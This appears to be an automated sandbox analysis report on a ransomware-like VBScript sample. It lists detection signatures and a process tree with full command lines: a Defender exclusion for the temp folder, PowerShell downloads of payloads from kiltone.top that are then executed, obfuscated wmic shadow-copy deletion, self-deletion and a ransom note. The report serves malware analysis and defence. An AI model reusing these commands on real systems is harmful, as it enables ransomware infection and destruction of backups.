Windows Analysis Report
NOTIFICATION_OF_DEPENDANTS.vbs
Overview
General Information
Detection
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Sigma detected: Delete shadow copy via WMIC
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes shadow drive data (may be related to ransomware)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Powershell drops PE file
Sigma detected: Control Panel Items
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Classification
Process Tree
- System is w10x64
- wscript.exe (PID: 7336 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - cmd.exe (PID: 7420 cmdline: "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 7472 cmdline: powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 04029E121A0CFA5991749937DD22A1D9)
  - chrome.exe (PID: 7660 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  - chrome.exe (PID: 7948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2040,i,2996806537159820788,4098969065651386126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  - cmd.exe (PID: 7720 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 7772 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp MD5: 04029E121A0CFA5991749937DD22A1D9)
  - cmd.exe (PID: 8272 cmdline: "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 8300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 8352 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl MD5: 04029E121A0CFA5991749937DD22A1D9)
  - cmd.exe (PID: 8784 cmdline: "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 8800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - control.exe (PID: 8928 cmdline: control C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 11C18DBF352D81C9532A8EF442151CB1)
  - rundll32.exe (PID: 9024 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: EF3179D498793BF4234F708D3BE28633)
  - rundll32.exe (PID: 9044 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user\AppData\Local\Temp/fjeljies.cpl MD5: 889B99C52A60DD49227C5E485A016679)
  - cmd.exe (PID: 3860 cmdline: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 7260 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - cmd.exe (PID: 3664 cmdline: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 4020 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - cmd.exe (PID: 2656 cmdline: cmd /c %temp%/eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 8468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - eryy65ty.exe (PID: 8532 cmdline: C:\Users\user\AppData\Local\Temp/eryy65ty.exe MD5: 9049FABA5517305C44BD5F28398FB6B9)
  - WMIC.exe (PID: 8236 cmdline: c:\pwciDK\pwci\..\..\Windows\pwci\pwci\..\..\system32\pwci\pwci\..\..\wbem\pwci\pwciD\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  - conhost.exe (PID: 876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - WMIC.exe (PID: 5528 cmdline: c:\kXortE\kXor\..\..\Windows\kXor\kXor\..\..\system32\kXor\kXor\..\..\wbem\kXor\kXort\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  - conhost.exe (PID: 8540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - cmd.exe (PID: 8848 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 8808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - PING.EXE (PID: 7648 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- svchost.exe (PID: 7840 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- eryy65ty.exe (PID: 6708 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9)
  - WMIC.exe (PID: 2948 cmdline: c:\OERBWD\OERB\..\..\Windows\OERB\OERB\..\..\system32\OERB\OERB\..\..\wbem\OERB\OERBW\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  - conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - WMIC.exe (PID: 5080 cmdline: c:\gejGMa\gejG\..\..\Windows\gejG\gejG\..\..\system32\gejG\gejG\..\..\wbem\gejG\gejGM\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  - conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - cmd.exe (PID: 4936 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - PING.EXE (PID: 5236 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- eryy65ty.exe (PID: 4008 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9)
  - WMIC.exe (PID: 6980 cmdline: c:\FnbgXj\Fnbg\..\..\Windows\Fnbg\Fnbg\..\..\system32\Fnbg\Fnbg\..\..\wbem\Fnbg\FnbgX\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  - conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - WMIC.exe (PID: 4652 cmdline: c:\gBvDaO\gBvD\..\..\Windows\gBvD\gBvD\..\..\system32\gBvD\gBvD\..\..\wbem\gBvD\gBvDa\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  - conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - cmd.exe (PID: 6460 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - PING.EXE (PID: 4824 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- notepad.exe (PID: 7560 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- cleanup
No configs have been found
No yara matches
Matched Sigma rules (rule titles and matching events were not captured; only the rule authors survive)
Operating System Destruction
- Author: Joe Security
System Summary
- Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
- Author: Jonathan Cheong, oscd.community
- Author: Jonathan Cheong, oscd.community
- Author: Jonathan Cheong, oscd.community
- Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
- Author: Florian Roth (Nextron Systems)
- Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
- Author: Ilya Krestinichev
- Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
- Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
- Author: Christian Burkard (Nextron Systems)
- Author: Florian Roth (Nextron Systems)
- Author: Florian Roth (Nextron Systems)
- Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
- Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
- Author: Michael Haag
- Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
- Author: vburov
No Suricata rule has matched
Signature details (the evidence rows were not captured; only the signature categories and evidence types survive)
AV Detection: Integrated Neural Analysis Model; Joe Sandbox ML; HTTP Parser; HTTPS traffic detected; Binary string; File opened
Software Vulnerabilities: Child process
Networking: Process created; IP Address; ASN Name; JA3 fingerprint; TCP traffic detected without corresponding DNS query; UDP traffic detected without corresponding DNS query; HTTP traffic detected; String found in binary or memory; DNS traffic detected